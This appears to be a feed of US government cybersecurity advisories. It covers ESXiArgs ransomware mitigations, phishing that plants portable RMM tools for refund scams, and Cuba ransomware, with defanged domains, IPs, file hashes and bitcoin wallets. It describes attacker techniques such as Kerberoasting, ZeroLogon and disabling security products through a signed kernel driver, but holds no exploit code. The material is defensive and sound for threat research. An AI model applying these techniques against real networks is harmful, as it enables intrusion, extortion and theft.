See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA also encourages government network administrators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response.

Additional resources for recovering .vmdk files can be found on a third-party researcher’s website.[2]

Mitigations

Note: These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. For more information on the CPGs, including additional recommended baseline protections, see cisa.gov/cpg.

CISA and FBI recommend all organizations:

Temporarily remove connectivity for the associated ESXi server(s).
- Upgrade your ESXi servers to the latest version of VMware ESXi software [CPG 5.1]. ESXi releases are cumulative, and the latest builds are documented in VMware’s article, Build numbers and versions of VMware ESXi/ESX.
- Harden ESXi hypervisors by disabling the Service Location Protocol (SLP) service, which ESXiArgs may leverage. For more information on executing workarounds, see VMware’s guidance How to Disable/Enable the SLP Service on VMware ESXi.
- Ensure your ESXi hypervisor is not configured to be exposed to the public internet.

In addition, CISA and FBI recommend organizations apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Preparing for Ransomware

Maintain offline backups of data, and regularly test backup and restoration [CPG 7.3]. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident [CPG 7.1, 7.2].

Mitigating and Preventing Ransomware

Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
Require phishing-resistant MFA for as many services as possible [CPG 1.3]—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
Implement allow-listing policies for applications and remote access that only allow systems to execute known and permitted programs.
Open document readers in protected viewing modes to help prevent active content from running.
Implement user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
Use strong passwords [CPG 1.4] and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and the NIST’s Special Publication 800-63B: Digital Identity Guidelines for more information.
Require administrator credentials to install software [CPG 1.5].
Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind [CPG 1.5].
Install and regularly update antivirus and antimalware software on all hosts.
Consider adding an email banner to messages coming from outside your organizations.
Disable hyperlinks in received emails.
Consider participating in CISA’s no-cost Automated Indicator Sharing (AIS) program to receive real-time exchange of machine-readable cyber threat indicators and defensive measures.

Responding to Ransomware Incidents

If a ransomware incident occurs at your organization:

Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).
Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
Follow the notification requirements as outlined in your cyber incident response plan.
Report incidents to CISA at cisa.gov/report, FBI at a local FBI Field Office, or the U.S. Secret Service (USSS) at a USSS Field Office.
Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Note: CISA and FBI strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.

Resources

See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.

Acknowledgements

CISA and FBI would like to thank VMware for their contributions to this CSA.

References

VMware Security Response Center (vSRC) Response to 'ESXiArgs' Ransomware Attack…

Enes Sonmez and Ahmet Aykac, YoreGroup Tech Team: decrypt your crypted files in…

Revisions

February, 2023: Initial Version

Protecting Against Malicious Use of Remote Monitoring and Management Software

CISA — Tue, 31 Jan 2023 16:32:46 EST

Summary

The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the “authoring organizations”) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders about malicious use of legitimate remote monitoring and management (RMM) software. In October 2022, CISA identified a widespread cyber campaign involving the malicious use of legitimate RMM software. Specifically, cyber criminal actors sent phishing emails that led to the download of legitimate RMM software—ScreenConnect (now ConnectWise Control) and AnyDesk—which the actors used in a refund scam to steal money from victim bank accounts.

Although this campaign appears financially motivated, the authoring organizations assess it could lead to additional types of malicious activity. For example, the actors could sell victim account access to other cyber criminal or advanced persistent threat (APT) actors. This campaign highlights the threat of malicious cyber activity associated with legitimate RMM software: after gaining access to the target network via phishing or other techniques, malicious cyber actors—from cybercriminals to nation-state sponsored APTs—are known to use legitimate RMM software as a backdoor for persistence and/or command and control (C2).

Using portable executables of RMM software provides a way for actors to establish local user access without the need for administrative privilege and full software installation—effectively bypassing common software controls and risk management assumptions.

The authoring organizations strongly encourage network defenders to review the Indicators of Compromise (IOCs) and Mitigations sections in this CSA and apply the recommendations to protect against malicious use of legitimate RMM software.

Download the PDF version of this report: pdf, 608 kb.

For a downloadable copy of IOCs, see AA23-025.stix (STIX, 19 kb).

Technical Details

Overview

In October 2022, CISA used trusted third-party reporting, to conduct retrospective analysis of EINSTEIN—a federal civilian executive branch (FCEB)-wide intrusion detection system (IDS) operated and monitored by CISA—and identified suspected malicious activity on two FCEB networks:

In mid-June 2022, malicious actors sent a phishing email containing a phone number to an FCEB employee’s government email address. The employee called the number, which led them to visit the malicious domain, myhelpcare[.]online.
In mid-September 2022, there was bi-directional traffic between an FCEB network and myhelpcare[.]cc.

Based on further EINSTEIN analysis and incident response support, CISA identified related activity on many other FCEB networks. The authoring organizations assess this activity is part of a widespread, financially motivated phishing campaign and is related to malicious typosquatting activity reported by Silent Push in the blog post Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains.

Malicious Cyber Activity

The authoring organizations assess that since at least June 2022, cyber criminal actors have sent help desk-themed phishing emails to FCEB federal staff’s personal, and government email addresses. The emails either contain a link to a “first-stage” malicious domain or prompt the recipients to call the cybercriminals, who then try to convince the recipients to visit the first-stage malicious domain. See figure 1 for an example phishing email obtained from an FCEB network.

Figure 1: Help desk-themed phishing email example

The recipient visiting the first-stage malicious domain triggers the download of an executable. The executable then connects to a “second-stage” malicious domain, from which it downloads additional RMM software.

CISA noted that the actors did not install downloaded RMM clients on the compromised host. Instead, the actors downloaded AnyDesk and ScreenConnect as self-contained, portable executables configured to connect to the actor’s RMM server.

Note: Portable executables launch within the user’s context without installation. Because portable executables do not require administrator privileges, they can allow execution of unapproved software even if a risk management control may be in place to audit or block the same software’s installation on the network. Threat actors can leverage a portable executable with local user rights to attack other vulnerable machines within the local intranet or establish long term persistent access as a local user service.

CISA has observed that multiple first-stage domain names follow naming patterns used for IT help/support themed social-engineering, e.g., hservice[.]live, gscare[.]live, nhelpcare[.]info, deskcareme[.]live, nhelpcare[.]cc). According to Silent Push, some of these malicious domains impersonate known brands such as, Norton, GeekSupport, Geek Squad, Amazon, Microsoft, McAfee, and PayPal.[1] CISA has also observed that the first-stage malicious domain linked in the initial phishing email periodically redirects to other sites for additional redirects and downloads of RMM software.

Use of Remote Monitoring and Management Tools

In this campaign, after downloading the RMM software, the actors used the software to initiate a refund scam. They first connected to the recipient’s system and enticed the recipient to log into their bank account while remaining connected to the system. The actors then used their access through the RMM software to modify the recipient’s bank account summary. The falsely modified bank account summary showed the recipient was mistakenly refunded an excess amount of money. The actors then instructed the recipient to “refund” this excess amount to the scam operator.
Although this specific activity appears to be financially motivated and targets individuals, the access could lead to additional malicious activity against the recipient’s organization—from both other cybercriminals and APT actors. Network defenders should be aware that:

Although the cybercriminal actors in this campaign used ScreenConnect and AnyDesk, threat actors can maliciously leverage any legitimate RMM software.
Because threat actors can download legitimate RMM software as self-contained, portable executables, they can bypass both administrative privilege requirements and software management control policies.
The use of RMM software generally does not trigger antivirus or antimalware defenses.
Malicious cyber actors are known to leverage legitimate RMM and remote desktop software as backdoors for persistence and for C2.[2],[3],[4],[5],[6],[7],[8]
RMM software allows cyber threat actors to avoid using custom malware.

Threat actors often target legitimate users of RMM software. Targets can include managed service providers (MSPs) and IT help desks, who regularly use legitimate RMM software for technical and security end-user support, network management, endpoint monitoring, and to interact remotely with hosts for IT-support functions. These threat actors can exploit trust relationships in MSP networks and gain access to a large number of the victim MSP's customers. MSP compromises can introduce significant risk—such as ransomware and cyber espionage—to the MSP’s customers.

The authoring organizations strongly encourage network defenders to apply the recommendations in the Mitigations section of this CSA to protect against malicious use of legitimate RMM software.

INDICATORS OF COMPROMISE

See table 1 for IOCs associated with the campaign detailed in this CSA.

*Table 1: Malicious Domains and IP addresses observed by CISA*
Domain	Description	Date(s) Observed
win03[.]xyz	Suspected first-stage malware domain	June 1, 2022 July 19, 2022
myhelpcare[.]online	Suspected first-stage malware domain	June 14, 2022
win01[.]xyz	Suspected first-stage malware domain	August 3, 2022 August 18, 2022
myhelpcare[.]cc	Suspected first-stage malware domain	September 14, 2022
247secure[.]us	Second-stage malicious domain	October 19, 2022 November 10, 2022

Additional resources to detect possible exploitation or compromise:

Silent Push: Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains.

Mitigations

The authoring organizations encourage network defenders to:

Implement best practices to block phishing emails. See CISA’s Phishing Infographic for more information.
Audit remote access tools on your network to identify currently used and/or authorized RMM software.
Review logs for execution of RMM software to detect abnormal use of programs running as a portable executable.
Use security software to detect instances of RMM software only being loaded in memory.
Implement application controls to manage and control execution of software, including allowlisting RMM programs.
- See NSA Cybersecurity Information sheet Enforce Signed Software Execution Policies.
- Application controls should prevent both installation and execution of portable versions of unauthorized RMM software.
Require authorized RMM solutions only be used from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
Block both inbound and outbound connections on common RMM ports and protocols at the network perimeter.
Implement a user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.

RESOURCES

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.
U.S. Defense Industrial Base (DIB) Sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov.
CISA offers several Vulnerability Scanning to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See cisa.gov/cyber-hygiene-services.
Consider participating in CISA’s Automated Indicator Sharing (AIS) to receive real-time exchange of machine-readable cyber threat indicators and defensive measures. AIS is offered at no cost to participants as part of CISA’s mission to work with our public and private sector partners to identify and help mitigate cyber threats through information sharing and provide technical assistance, upon request, that helps prevent, detect, and respond to incidents.

PURPOSE

This advisory was developed by CISA, NSA, and MS-ISAC in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA, NSA, and MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

References

[1] Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains. — Silent Push Threat Intelligence

[2] Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization | CISA

[3] Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks | CISA

[4] Karakurt Data Extortion Group | CISA

[5] Compromise of U.S. Water Treatment Facility | CISA

[6] North Korean Advanced Persistent Threat Focus: Kimsuky | CISA

[7] Continued Threat Actor Exploitation Post Pulse Secure VPN Patching | CISA

[8] FBI Warns Public to Beware of Tech Support Scammers Targeting Financial Accounts Using Remote Desktop Software — FBI

Revisions

January 25, 2023: Initial Version

#StopRansomware: Cuba Ransomware

CISA — Tue, 31 Jan 2023 16:32:46 EST

Summary

Actions to take today to mitigate cyber threats from ransomware:

• Prioritize remediating known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Enable and enforce phishing-resistant multifactor authentication.

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Cuba ransomware IOCs and TTPs associated with Cuba ransomware actors identified through FBI investigations, third-party reporting, and open-source reporting. This advisory updates the December 2021 FBI Flash: Indicators of Compromise Associated with Cuba Ransomware.

Note: While this ransomware is known by industry as “Cuba ransomware,” there is no indication Cuba ransomware actors have any connection or affiliation with the Republic of Cuba.

Since the release of the December 2021 FBI Flash, the number of U.S. entities compromised by Cuba ransomware has doubled, with ransoms demanded and paid on the increase.

This year, Cuba ransomware actors have added to their TTPs, and third-party and open-source reports have identified a possible link between Cuba ransomware actors, RomCom Remote Access Trojan (RAT) actors, and Industrial Spy ransomware actors.

FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Cuba ransomware and other ransomware operations.

Download the PDF version of this report: pdf, 649 kb.

For a downloadable copy of IOCs, see:

AA22-335A.stix (STIX 148 kb).
(Updated December 12, 2022) AA22-335A-2.stix (STIX, 67 kb). (End of Update.)

Technical Details

Overview

Since the December 2021 release of FBI Flash: Indicators of Compromise Associated with Cuba Ransomware, FBI has observed Cuba ransomware actors continuing to target U.S. entities in the following five critical infrastructure sectors: Financial Services, Government Facilities, Healthcare and Public Health, Critical Manufacturing, and Information Technology. As of August 2022, FBI has identified that Cuba ransomware actors have:

Compromised 101 entities, 65 in the United States and 36 outside the United States.
Demanded 145 million U.S. Dollars (USD) and received 60 million USD in ransom payments.

Cuba Ransomware Actors’ Tactics, Techniques, and Procedures

As previously reported by FBI, Cuba ransomware actors have leveraged the following techniques to gain initial access into dozens of entities in multiple critical infrastructure sectors:

Known vulnerabilities in commercial software [T1190]
Phishing campaigns [T1566]
Compromised credentials [T1078]
Legitimate remote desktop protocol (RDP) tools [T1563.002]

After gaining initial access, the actors distributed Cuba ransomware on compromised systems through Hancitor—a loader known for dropping or executing stealers, such as Remote Access Trojans (RATs) and other types of ransomware, onto victims’ networks.

Since spring 2022, Cuba ransomware actors have modified their TTPs and tools to interact with compromised networks and extort payments from victims.[1],[2]

Cuba ransomware actors have exploited known vulnerabilities and weaknesses and have used tools to elevate privileges on compromised systems. According to Palo Alto Networks Unit 42,[2] Cuba ransomware actors have:

Exploited CVE-2022-24521 in the Windows Common Log File System (CLFS) driver to steal system tokens and elevate privileges.
Used a PowerShell script to identify and target service accounts for their associated Active Directory Kerberos ticket. The actors then collected and cracked the Kerberos tickets offline via Kerberoasting [T1558.003].
Used a tool, called KerberCache, to extract cached Kerberos tickets from a host’s Local Security Authority Server Service (LSASS) memory [T1003.001].
Used a tool to exploit CVE-2020-1472 (also known as “ZeroLogon”) to gain Domain Administrative privileges [T1068]. This tool and its intrusion attempts have been reportedly related to Hancitor and Qbot.

According to Palo Alto Networks Unit 42, Cuba ransomware actors use tools to evade detection while moving laterally through compromised environments before executing Cuba ransomware. Specifically, the actors, “leveraged a dropper that writes a kernel driver to the file system called ApcHelper.sys. This targets and terminates security products. The dropper was not signed; however, the kernel driver was signed using the certificate found in the LAPSUS NVIDIA leak." [T1562.001].[2]

In addition to deploying ransomware, the actors have used “double extortion” techniques, in which they exfiltrate victim data, and (1) demand a ransom payment to decrypt it and, (2) threaten to publicly release it if a ransom payment is not made.[2]

Cuba Ransomware Link to RomCom and Industrial Spy Marketplace

Since spring 2022, third-party and open-source reports have identified an apparent link between Cuba ransomware actors, RomCom RAT actors, and Industrial Spy ransomware actors:

According to Palo Alto Networks Unit 42, Cuba ransomware actors began using RomCom malware, a custom RAT, for command and control (C2).[2]
Cuba ransomware actors may also be leveraging Industrial Spy ransomware. According to third-party reporting, suspected Cuba ransomware actors compromised a foreign healthcare company. The threat actors deployed Industrial Spy ransomware, which shares distinct similarities in configuration to Cuba ransomware. Before deploying the ransomware, the actors moved laterally using Impacket and deployed the RomCom RAT and Meterpreter Reverse Shell HTTP/HTTPS proxy via a C2 server [T1090].
Cuba ransomware actors initially used their leak site to sell stolen data; however, around May 2022, the actors began selling their data on Industrial Spy’s online market for selling stolen data.[2]

RomCom actors have targeted foreign military organizations, IT companies, food brokers and manufacturers.[3][4] The actors copied legitimate HTML code from public-facing webpages, modified the code, and then incorporated it in spoofed domains [T1584.001], which allowed the RomCom actors to:

Host counterfeit Trojanized applications for
- SolarWinds Network Performance Monitor (NPM),
- KeePass password manager,
- PDF Reader Pro, (by PDF Technologies, Inc., not an Adobe Acrobat or Reader product), and
- Advanced IP Scanner software;
Deploy the RomCom RAT as the final stage.

INDICATORS OF COMPROMISE

See tables 1 through 5 for Cuba ransomware IOCs that FBI obtained during threat response investigations as of late August 2022. In addition to these tables, see the publications in the References section below for aid in detecting possible exploitation or compromise.

Note: For IOCs as of early November 2021, see FBI Flash: Indicators of Compromise Associated with Cuba Ransomware.

*Table 1: Cuba Ransomware Associated Files and Hashes, as of Late August 2022*
File Name	File Path	File Hash
netping.dll	c:\windows\temp	SHA256: f1103e627311e73d5f29e877243e7ca203292f9419303c661aec57745eb4f26c
shar.bat		MD5: 4c32ef0836a0af7025e97c6253054bca SHA256: a7c207b9b83648f69d6387780b1168e2f1eabd23ae6e162dd700ae8112f8b96c
Psexesvc.exe		SHA256: 141b2190f51397dbd0dfde0e3904b264c91b6f81febc823ff0c33da980b69944
1.bat
216155s.dll
23246s.bat		SHA256: 02a733920c7e69469164316e3e96850d55fca9f5f9d19a241fad906466ec8ae8
23246s.dll		SHA256: 0cf6399db55d40bc790a399c6bbded375f5a278dc57a143e4b21ea3f402f551f
23246st.dll		SHA256: f5db51115fa0c910262828d0943171d640b4748e51c9a140d06ea81ae6ea1710
259238e.exe
31-100.bat
3184.bat
3184.dll
45.dll		SHA256: 857f28b8fe31cf5db6d45d909547b151a66532951f26cda5f3320d2d4461b583
4ca736d.exe
62e2e37.exe
64.235.39.82
64s.dll
7z.sfx
7zCon.sfx
7-zip.chm
82.ps1
9479.bat		SHA256: 08eb4366fc0722696edb03981f00778701266a2e57c40cd2e9d765bf8b0a34d0
9479p.bat		SHA256: f8144fa96c036a8204c7bc285e295f9cd2d1deb0379e39ee8a8414531104dc4a
9479p.ps1		SHA256: 88d13669a994d2e04ec0a9940f07ab8aab8563eb845a9c13f2b0fec497df5b17
a.exe		MD5: 03c835b684b21ded9a4ab285e4f686a3 SHA1: eaced2fcfdcbf3dca4dd77333aaab055345f3ab4 SHA256: 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 SHA256: 0d5e3483299242bf504bd3780487f66f2ec4f48a7b38baa6c6bc8ba16e4fb605 SHA256: 7e00bfb622072f53733074795ab581cf6d1a8b4fc269a50919dda6350209913c SHA256: af4523186fe4a5e2833bbbe14939d8c3bd352a47a2f77592d8adcb569621ce02
a220.bat
a220.dll		SHA256: 8a3d71c668574ad6e7406d3227ba5adc5a230dd3057edddc4d0ec5f8134d76c3
a82.exe		SHA256: 4306c5d152cdd86f3506f91633ef3ae7d8cf0dd25f3e37bec43423c4742f4c42
a91.exe		SHA256: 3d4502066a338e19df58aa4936c37427feecce9ab8d43abff4a7367643ae39ce
a99.exe		SHA256: f538b035c3de87f9f8294bec272c1182f90832a4e86db1e47cbb1ab26c9f3a0b
aa.exe
aa2.exe
aaa.stage.16549040.dns.alleivice.com
add2.exe
advapi32.dll
agent.13.ps1
agent.bat		SHA256: fd87ca28899823b37b2c239fbbd236c555bcab7768d67203f86d37ede19dd975
agent.dll
agent13.bat
agent13.ps1		SHA256: 1817cc163482eb21308adbd43fb6be57fcb5ff11fd74b344469190bb48d8163b
agent64.bin		SHA256: bff4dd37febd5465e0091d9ea68006be475c0191bd8c7a79a44fbf4b99544ef1
agsyst121.bat
agsyst121.dll
all.bat		SHA256: ecefd9bb8b3783a81ab934b44eb3d84df5e58f0289f089ef6760264352cf878a
all.dll		SHA256: db3b1f224aec1a7c58946d819d729d0903751d1867113aae5cca87e38c653cf4
anet.exe		SHA1: 241ce8af441db2d61f3eb7852f434642739a6cc3 SHA256: 74fbf3cc44dd070bd5cb87ca2eed03e1bbeec4fec644a25621052f0a73abbe84 SHA256: b160bd46b6efc6d79bfb76cf3eeacca2300050248969decba139e9e1cbeebf53 SHA256: f869e8fbd8aa1f037ad862cf6e8bbbf797ff49556fb100f2197be4ee196a89ae
App.exe
appnetwork.exe
AppVClient.man
aswSP_arPot2
aus.exe		SHA256: 0c2ffed470e954d2bf22807ba52c1ffd1ecce15779c0afdf15c292e3444cf674 SHA256: 310afba59ab8e1bda3ef750a64bf39133e15c89e8c7cf4ac65ee463b26b136ba
av.bat		SHA256: b5d202456ac2ce7d1285b9c0e2e5b7ddc03da1cbca51b5da98d9ad72e7f773b8
c2.ps1
c2.ps1
cdzehhlzcwvzcmcr.aspx
check.exe
checkk.exe
checkk.txt		SHA256: 1f842f84750048bb44843c277edeaa8469697e97c4dbf8dc571ec552266bec9f
client32.exe
comctl32 .dll
comp2.ps1
comps2.ps1
cqyrrxzhumiklndm.aspx
defendercontrol.exe
ff.exe		SHA256: 1b943afac4f476d523310b8e3afe7bca761b8cbaa9ea2b9f01237ca4652fc834
File __agsyst121.dll
File __aswArPot.sys
File __s9239.dll
File_agsyst121.dll
File_aswArPot.sys
File_s9239.dll
ga.exe
gdi32 .dll
geumspbgvvytqrih.aspx
IObit UNLOCKER.exe
kavsa32.exe		MD5: 236f5de8620a6255f9003d054f08574b SHA1: 9b546bd99272cf4689194d698c830a2510194722
kavsyst32.exe
kernel32.dll
komar.bat		SHA256: B9AFE016DBDBA389000B01CE7645E7EEA1B0A50827CDED1CBAA48FBC715197BB
komar.dll
komar121.bat
komar121.dll
komar2.ps1		SHA256: 61971d3cbf88d6658e5209de443e212100afc8f033057d9a4e79000f6f0f7cc4
komar64.dll		SHA256: 8E64BACAF40110547B334EADCB0792BDC891D7AE298FBFFF1367125797B6036B
mfcappk32.exe
newpass.ps1		SHA256: c646199a9799b6158de419b1b7e36b46c7b7413d6c35bfffaeaa8700b2dcc427
npalll.exe		SHA256: bd270853db17f94c2b8e4bd9fa089756a147ed45cbc44d6c2b0c78f361978906
ole32.dll
oleaut32.dll
open.bat		SHA256: 2EB3EF8A7A2C498E87F3820510752043B20CBE35B0CBD9AF3F69E8B8FE482676
open.exe
pass.ps1		SHA256: 0afed8d1b7c36008de188c20d7f0e2283251a174261547aab7fb56e31d767666
pdfdecrypt.exe
powerview.ps1
prt3389.bat		SHA256: e0d89c88378dcb1b6c9ce2d2820f8d773613402998b8dcdb024858010dec72ed
ra.ps1		SHA256: 571f8db67d463ae80098edc7a1a0cad59153ce6592e42d370a45df46f18a4ad8
rg1.exe
Rg2.exe
rundll32
s64174.bat		SHA256: 10a5612044599128981cb41d71d7390c15e7a2a0c2848ad751c3da1cbec510a2 SHA256: 1807549af1c8fdc5b04c564f4026e41790c554f339514d326f8b55cb7b9b4f79
s64174.dll
s9239.bat
s9239.dll
shell32.dll
stel.exe
syskav64.exe
sysra64,exe
systav332.bat		SHA256: 01242b35b6def71e42cc985e97d618e2fabd616b16d23f7081d575364d09ca74
TC-9.22a.2019.3.exe
TeamViewer.exe
testDLL.dll
tug4rigd.dll		SHA256: 952b34f6370294c5a0bb122febfaa80612fef1f32eddd48a3d0556c4286b7474
UpdateNotificationPipeline.002.etl
user32.dll
v1.bat
v2.bat
v3.bat
veeamp.exe		SHA256: 9aa1f37517458d635eae4f9b43cb4770880ea0ee171e7e4ad155bbdee0cbe732
version.dll
vlhqbgvudfnirmzx.aspx
wininet.dll
wlog.exe
wpeqawzp.sys
y3lcx345.dll
zero.exe		SHA256: 3a8b7c1fe9bd9451c0a51e4122605efc98e7e4e13ed117139a13e4749e211ed0

*Table 2: Cuba Ransomware Associated Email Addresses, as of Late August 2022*
Email Provider	Email Addresses
Cuba-supp[.]com	admin@cuba-supp[.]com
Encryption-support[.]com	admin@encryption-support[.]com
Mail.supports24[.]net	inbox@mail.supports24[.]net

*Table 3: Cuba Ransomware Associated Jabber Address, as of Late August 2022*
cuba_support@exploit[.]im

Table 4: IP Addresses Associated with Cuba Ransomware, as of Late August 2022
Note: Some of these observed IP addresses are more than a year old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action such as blocking.
193.23.244[.]244	144.172.83[.]13	216.45.55[.]30
94.103.9[.]79	149.255.35[.]131	217.79.43[.]148
192.137.101[.]46	154.35.175[.]225	222.252.53[.]33
92.222.172[.]39	159.203.70[.]39	23.227.198[.]246
92.222.172[.]172	171.25.193[.]9	31.184.192[.]44
10.13.102[.]1	185.153.199[.]169	37.120.247[.]39
10.13.102[.]58	192.137.100[.]96	37.44.253[.]21
10.133.78[.]41	192.137.100[.]98	38.108.119[.]121
10.14.100[.]20	192.137.101[.]205	45.164.21[.]13
103.114.163[.]197	193.34.167[.]17	45.32.229[.]66
103.27.203[.]197	194.109.206[.]212	45.86.162[.]34
104.217.8[.]100	195.54.160[.]149	45.91.83[.]176
107.189.10[.]143	199.58.81[.]140	64.52.169[.]174
108.170.31[.]115	204.13.164[.]118	64.235.39[.]82
128.31.0[.]34	209.76.253[.]84	79.141.169[.]220
128.31.0[.]39	212.192.241[.]230	84.17.52[.]135
131.188.40[.]189	213.32.39[.]43	86.59.21[.]38
141.98.87[.]124	216.45.55[.]3

*Table 5: Cuba Bitcoin Wallets Receiving Payments, as of Late August 2022*
bc1q4vr25xkth35qslenqwd7aw020w85qrvlrhv7hc
bc1q5uc0fdnz0ve5pg4nl4upa9ly586t6wmnghfe7x
bc1q6rsj3cn37dngypu5kad9gdw5ykhctpwhjvun3z
bc1q6zkemtyyrre2mkk23g93zyq98ygrygvx7z2q0t
bc1q9cj0n9k2m282x0nzj6lhqjvhkkd4h95sewek83
bc1qaselp9nhejc3safcq3vn5wautx6w33x0llk7dl
bc1qc48q628t93xwzljtvurpqhcvahvesadpwqtsza
bc1qgsuf5m9tgxuv4ylxcmx8eeqn3wmlmu7f49zkus
bc1qhpepeeh7hlz5jvrp50uhkz59lhakcfvme0w9qh
bc1qjep0vx2lap93455p7h29unruvr05cs242mrcah
bc1qr9l0gcl0nvmngap6ueyy5gqdwvm34kdmtevjyx
bc1qs3lv77udkap2enxv928x59yuact5df4t95rsqr
bc1qyd05q2m5qt3nwpd3gcqkyer0gspqx5p6evcf7h
bc1qzz7xweq8ee2j35tq6r5m687kctq9huskt50edv
bc1qvpk8ksl3my6kjezjss9p28cqj4dmpmmjx5yl3y
bc1qhtwfcysclc7pck2y3vmjtpzkaezhcm6perc99x
bc1qft3s53ur5uq5ru6sl3zyr247dpr55mnggwucd3
bc1qp7h9fszlqxjwyfhv0upparnsgx56x7v7wfx4x7
bc1q4vr25xkth35qslenqwd7aw020w85qrvlrhv7hc
bc1q5uc0fdnz0ve5pg4nl4upa9ly586t6wmnghfe7x
bc1q6rsj3cn37dngypu5kad9gdw5ykhctpwhjvun3z
bc1q6zkemtyyrre2mkk23g93zyq98ygrygvx7z2q0t
bc1q9cj0n9k2m282x0nzj6lhqjvhkkd4h95sewek83
bc1qaselp9nhejc3safcq3vn5wautx6w33x0llk7dl
bc1qc48q628t93xwzljtvurpqhcvahvesadpwqtsza
bc1qgsuf5m9tgxuv4ylxcmx8eeqn3wmlmu7f49zkus
bc1qhpepeeh7hlz5jvrp50uhkz59lhakcfvme0w9qh
bc1qjep0vx2lap93455p7h29unruvr05cs242mrcah
bc1qr9l0gcl0nvmngap6ueyy5gqdwvm34kdmtevjyx
bc1qs3lv77udkap2enxv928x59yuact5df4t95rsqr
bc1qyd05q2m5qt3nwpd3gcqkyer0gspqx5p6evcf7h
bc1qzz7xweq8ee2j35tq6r5m687kctq9huskt50edv

See figure 1 for an example of a Cuba ransomware note.

*Figure 1: Sample Cuba Ransom Note 2, as of late August 2022*
